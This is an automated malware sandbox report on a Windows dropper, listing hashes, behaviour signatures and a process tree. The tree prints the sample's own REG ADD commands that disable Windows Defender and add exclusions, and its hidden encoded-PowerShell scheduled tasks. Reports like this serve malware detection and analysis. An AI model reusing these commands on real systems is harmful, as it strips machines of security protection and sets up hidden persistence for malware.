Analysis
-
max time kernel
152s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
18/10/2022, 15:41
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
da1bc38380286df3feea1fdca57ea038
-
SHA1
5956c406ba4c9b8c53541fe29e4e431355a099be
-
SHA256
df6d5d22ec1f14d6fe4932adf11ef8940ec436bb0e46ff21bb342117de116818
-
SHA512
87e162a70c855462905d636e230c07b9bdb1e75e768e3d6283f9c96be77cdee24e14f560b05c959e928fb4196bbc28fafa98868430ba722ebf7360401a414606
-
SSDEEP
196608:91ORcB5FC9b06B1MTKGo118U6ke2cH9sN4LcZVq/iTSOP2y95D:3OwK9b06BDGov798GZ4iPPf95D
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 3 IoCs
pid Process 1384 Install.exe 628 Install.exe 964 iRDzntZ.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1248 file.exe 1384 Install.exe 1384 Install.exe 1384 Install.exe 1384 Install.exe 628 Install.exe 628 Install.exe 628 Install.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol iRDzntZ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini iRDzntZ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iRDzntZ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bxLHRKpEAJQThoYlam.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1008 schtasks.exe 1768 schtasks.exe 1572 schtasks.exe 1180 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1828 powershell.EXE 1828 powershell.EXE 1828 powershell.EXE 1292 powershell.EXE 1292 powershell.EXE 1292 powershell.EXE 1560 powershell.EXE 1560 powershell.EXE 1560 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1828 powershell.EXE Token: SeDebugPrivilege 1292 powershell.EXE Token: SeDebugPrivilege 1560 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1248 wrote to memory of 1384 1248 file.exe 26 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 1384 wrote to memory of 628 1384 Install.exe 27 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 1388 628 Install.exe 29 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 628 wrote to memory of 696 628 Install.exe 31 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 1388 wrote to memory of 1520 1388 forfiles.exe 33 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 696 wrote to memory of 1780 696 forfiles.exe 34 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1780 wrote to memory of 400 1780 cmd.exe 36 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1520 wrote to memory of 1772 1520 cmd.exe 35 PID 1780 wrote to memory of 1476 1780 cmd.exe 37 PID 1520 wrote to memory of 1572 1520 cmd.exe 38 PID 1520 wrote to memory of 1572 1520 cmd.exe 38 PID 1520 wrote to memory of 1572 1520 cmd.exe 38 PID 1780 wrote to memory of 1476 1780 cmd.exe 37 PID 1780 wrote to memory of 1476 1780 cmd.exe 37 PID 1520 wrote to memory of 1572 1520 cmd.exe 38 PID 1520 wrote to memory of 1572 1520 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1772
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1572
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:400
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1476
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnIdsCfgV" /SC once /ST 02:53:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnIdsCfgV"4⤵PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnIdsCfgV"4⤵PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxLHRKpEAJQThoYlam" /SC once /ST 17:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe\" Xi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1768
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {140586B7-9E02-436B-B39B-07050E09A6D2} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:268
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1176
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1740
-
C:\Windows\system32\taskeng.exetaskeng.exe {10755D13-5A45-40FA-BE5F-0549598F5332} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exeC:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe Xi /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghdGXRaKd" /SC once /ST 13:34:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghdGXRaKd"3⤵PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghdGXRaKd"3⤵PID:704
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:844
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1636
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEAlrErCZ" /SC once /ST 15:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEAlrErCZ"3⤵PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEAlrErCZ"3⤵PID:520
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵PID:1332
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵PID:1640
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵PID:540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\BSCTWiFJDtUitSTE\UDxqqnDG\LPLrJXxmpygcloje.wsf"3⤵PID:1748
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\BSCTWiFJDtUitSTE\UDxqqnDG\LPLrJXxmpygcloje.wsf"3⤵PID:1124
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1652
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1276
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5eb7a824d4c615559aa450089e298349e
SHA12ac227bd989eb95d2e2e1b9b387d31f48889ecd3
SHA256421627c8ba9aed96d9e34ce407a4a09e877c0b4d7d72b1c551197f614ca4a878
SHA512baaa66d8354265545b638a8236a8ef61e818de257f6f25fb2f53d27c4c313f0b9ef78f0946dfbd1fbe6cc3c7336bcd773c1c474dbaa656262411266cdd07c67f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c10555c1d0f786ffa5ff2e5a88b37310
SHA1266a54fee309a6b5d435808dcf43758825fc6686
SHA25654cf69c958619ff0a4b208e70df8701e8147e1eaf4978f1856a59d2df8fc9a86
SHA512ab307a6ccb870689ee6775748f84739617c63d66a89dd4b66db8e8ffbe3dbb62c36ef38db148cf368fec314df74eddd26f7fada74f532da07330178c9582ffc8
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.3MB
MD582a5c0315f25dcc50db6b5c6cfd719b9
SHA1be08406d495a7d51a0fae4527b5ab3dad0fab8e2
SHA256211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a
SHA512d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7
-
Filesize
6.8MB
MD55d6141af60cd8b24b8b290bf6636587b
SHA148eb68439991352862705c712e78bec9e9c22cc0
SHA256a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e
SHA512a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7